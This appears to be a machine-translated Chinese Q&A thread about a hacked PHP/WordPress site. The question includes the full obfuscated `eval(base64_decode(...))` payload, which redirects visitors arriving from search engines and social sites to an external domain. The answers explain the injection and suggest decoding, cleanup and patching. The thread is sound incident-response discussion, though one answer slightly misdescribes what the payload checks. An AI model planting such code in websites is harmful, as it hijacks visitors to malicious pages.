恶意代码：eval（base64_decode（[关闭]

Question

最近我注意到一个 jquery mobile - 创建的 php 网站没有加载。当我检查相关的 php 文件时，我可以看到一些额外的字符进入了代码中。在标签 <?php 之后很快出现了无关字符。原因是什么？我的网站被黑了吗？我将如何恢复我的所有文件？这些文件正在通过控制面板登录访问。我什至可以看到网站文件夹之外的文件，一些 wp 文件（wp-config.php、wp-blog-header.php 等）也包含这些额外的字符。

这是发现的恶意代码 - <?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVI

请高人指教。

这是完整的代码

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iK SBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcGtqbGFwb2suMWR1bWIuY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));

Answer 1

回答直接问题：是的，您的网站已被黑客入侵。

eval(base64_decode(....)) 旨在掩饰正在执行的代码的性质，但它无法掩饰您的 PHP 文件中有不属于该处的代码这一事实。

至于被黑代码的作用，我无法回答，因为你还没有提供全部。

我也无法回答关于他们可能是如何进入的的任何问题，但很可能是在您的系统（或您的网络托管公司的系统）的某个地方有一个软件包它有一个已知的安全漏洞。

在大多数情况下，该软件的供应商会修复此漏洞，但被黑网站上的版本不会使用最新修复程序进行更新，从而使黑客有机会进入。

还有其他方法可以侵入网站，但这是目前为止最有可能的方法。

我无法告诉您使用了哪些软件来入侵您的网站；涉及的变量太多，我对此了解的不够多。我可以建议您确保您负责的所有软件都是安全的并运行最新版本，并与您的托管公司核实以确保它们也完全是最新的。

您没有按名称提及 Wordpress，但您指定的文件听起来像是属于 Wordpress。因此，恢复文件应该只是将它们更新回原始 Wordpress 版本的情况。但是，正如我所说，您应该确保更新到最新的 WP 版本，因为听起来您拥有的版本已经过时且易受攻击。

您页面中的实际数据可能已被泄露，但所描述的 hack 的性质听起来更像是 PHP 注入 hack，所以我希望如果您将 WP 文件恢复到其原始状态，您的页面将被恢复。但是，您应该彻底检查，以确保其中没有任何意外情况。

[编辑] 现在我们有了完整的代码，很容易看到它在做什么：将代码复制到一个小的 PHP 程序中，并将eval 替换为print，这样您就可以看到正在运行，而不是实际运行它。答案是它会检查用户不是 googlebot 或类似用户，如果不是，它会将页面重定向到恶意 URL。

Answer 2

这是旧版 WordPress 和其他旧版 CMS 的常见问题，尤其是那些使用旧版 timthumb 动态处理图像的问题。

有人将该代码注入到您的大多数 .PHP 文件的顶部（至少是那些以空行 <?php 打开的文件）。这发生在我几个月前。

eval() 代码基本上是“加密”恶意 PHP 代码并在 PHP 文件打开时运行它（evaluating）。如果没有看到完整的 base64 字符串（并对其进行解码），就不可能确定代码的作用，但如果它与发生在我身上的注入类似，它会将一些 JavaScript 代码附加到您的站点以将访问者重定向到恶意页面，或者以其他方式改变您网站中的链接行为。

您需要找到导致此问题的漏洞，然后将其关闭。如果它是 WordPress 的过时版本，请升级。检查您的访问日志中是否存在可疑的 POST 查询。

我知道解决此问题的唯一方法是从您盒子上的每个 PHP 文件中删除 PHP 代码。如果每个文件中的代码相同，则可以使用 Linux bash 命令和高级文本编辑器从多个文件中删除代码。如果没有，请拿起文件、记事本和一大杯咖啡:)